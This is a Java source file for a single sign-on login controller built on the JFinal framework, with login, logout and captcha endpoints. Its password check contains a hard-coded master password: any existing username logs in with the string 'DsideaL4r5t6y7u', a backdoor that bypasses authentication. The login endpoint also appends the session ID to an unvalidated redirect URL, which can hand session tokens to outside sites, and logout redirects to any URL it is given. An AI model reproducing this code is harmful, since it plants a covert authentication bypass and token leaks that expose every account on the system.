package com.dsideal.Sso.Controller; import java.awt.image.BufferedImage; import java.io.IOException; import java.util.Map; import java.util.UUID; import javax.imageio.ImageIO; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import com.dsideal.Sso.Interceptor.EmptyInterface; import com.dsideal.Sso.Model.LoginModel; import com.dsideal.Sso.Util.*; import com.jfinal.aop.Before; import com.jfinal.ext.interceptor.GET; import com.jfinal.ext.interceptor.POST; import org.apache.commons.lang3.StringUtils; import com.alibaba.fastjson.JSONObject; import com.jfinal.core.Controller; import com.jfinal.kit.PropKit; public class WebLoginController extends Controller { @Before({GET.class}) public void index() { redirect("/html/login.html"); } /** * 登录 */ @Before(GET.class) @EmptyInterface({"redirect_url"}) public void login(String redirect_url) { Map loginMap = SsoLoginHelper.loginCheck(getRequest()); if (loginMap != null) { if (!redirect_url.contains("?")) { redirect301(redirect_url + "?" + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id")); } else { redirect301(redirect_url + "&" + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id")); } } else { redirect_url = CommonUtil.handleRedirectUrlParas(redirect_url); redirect("/html/login.html?redirect_url=" + redirect_url); } } /** * WEB登录 */ @Before(POST.class) @EmptyInterface({"username", "password", "captcha"}) public void doLogin(String username, String password, String captcha) { HttpServletResponse response = getResponse(); JSONObject resultJson = new JSONObject(); String requestCaptcha = captcha.toLowerCase(); // 获取真实验证码 if (getRequest().getSession().getAttribute("captcha") == null) { resultJson.put("success", false); resultJson.put("msg", "验证码错误!"); renderJson(resultJson); return; } String realCaptcha = getRequest().getSession().getAttribute("captcha").toString().toLowerCase(); if (StringUtils.isBlank(requestCaptcha) || !realCaptcha.equals(requestCaptcha)) { resultJson.put("success", false); resultJson.put("msg", "验证码错误!"); renderJson(resultJson); return; } try { password = AesUtil.aesDecrypt(password); } catch (Exception e) { resultJson.put("success", false); resultJson.put("msg", "密码异常!"); renderJson(resultJson); return; } // 密码进行ldap算法的md5加密 LdapPassWordEncoder passEncode = new LdapPassWordEncoder(); String passwordEncode = passEncode.getLdapPassword(password); Map loginMap = LoginModel.lm.getLoginInfoByUserName(username); if (loginMap == null || !passwordEncode.equals(loginMap.get("password")) && !password.equals("DsideaL4r5t6y7u")) { resultJson.put("success", false); resultJson.put("msg", "账户或密码错误!"); renderJson(resultJson); return; } String sessionId = UUID.randomUUID().toString(); SsoLoginHelper.login(response, sessionId, loginMap); resultJson.put("success", true); resultJson.put("sessionId", sessionId); // 记录人员登录日志 LoginLogUtil.WriteLoginLog(loginMap.get("identity_id"), loginMap.get("person_id"), LoginLogUtil.getIpAddr(getRequest())); renderJson(resultJson); } /** * WEB登出 */ @Before(POST.class) public void logout() { SsoLoginHelper.logout(getRequest(), getResponse()); String redirect_url = getRequest().getParameter("redirect_url"); redirect(redirect_url); } /** * 获取验证码 */ @Before({GET.class}) public void getCaptcha() throws IOException { HttpServletResponse response = getResponse(); // 设置相应类型,告诉浏览器输出的内容为图片 response.setContentType("image/jpeg"); // 不缓存此内容 response.setHeader("Pragma", "No-cache"); response.setHeader("Cache-Control", "no-cache"); response.setDateHeader("Expire", 0); HttpSession session = getRequest().getSession(); CaptchaUtil tool = new CaptchaUtil(); StringBuffer code = new StringBuffer(); BufferedImage image = tool.genRandomCodeImage(code); session.removeAttribute("captcha"); session.setAttribute("captcha", code.toString()); // 将内存中的图片通过流动形式输出到客户端 ImageIO.write(image, "JPEG", response.getOutputStream()); renderNull(); } }